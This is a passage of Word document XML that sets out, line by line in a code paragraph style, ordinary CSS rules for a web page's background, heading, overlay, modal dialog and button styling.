        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>-webkit-font-smoothing: antialiased;</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ody {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: linear-gradient(to bottom right, #30cfd0, #f6d365);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>line-height: 1.5;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>text-align: center;</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h1 {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-weight: 200;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-size: 3rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>color: white;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>text-align: center;</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overlay {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>position: fixed;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>top: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>left: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>width: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>height: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: rgba(0, 0, 0, 0.5);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>opacity: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>transition: .5s ease;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>z-index: -1;</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overlay.active {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>opacity: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>z-index: 2;</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modal {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>max-height: calc(100% - 100px);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>position: fixed;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>top: 50%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>left: 50%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>max-width: 450px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>transform: translate(-50%, -50%);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>color: #4a5666;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: linear-gradient(to bottom right, white, #F8F8F8) !important;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">  box-shadow: 0 15px 20px -15px rgba(0, 0, 0, 0.3), 0 35px 50px -25px rgba(0, 0, 0, 0.3), 0 85px 60px -25px rgba(0, 0, 0, 0.1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>z-index: 3;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>visibility: hidden;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>opacity: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>transition: .5s ease;</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modal h2 {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>margin: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-weight: 400;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>padding: 1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>border-bottom: 1px solid #DDE0E7;</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modal p {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>padding: 1rem;</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modal.active {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>visibility: visible;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>opacity: 1;</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utton {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>display: inline-block;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: rgba(10, 20, 30, .3);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>border: 1px solid transparent;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>color: white;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>text-decoration: none;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-size: 1.2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>padding: 1rem 2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>border-radius: 45px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>margin: .25rem 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>vertical-align: middle;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>line-height: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>overflow: visible;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>white-space: nowrap;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>cursor: pointer;</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utton:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>border: 1px solid rgba(255, 255, 255, .8);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
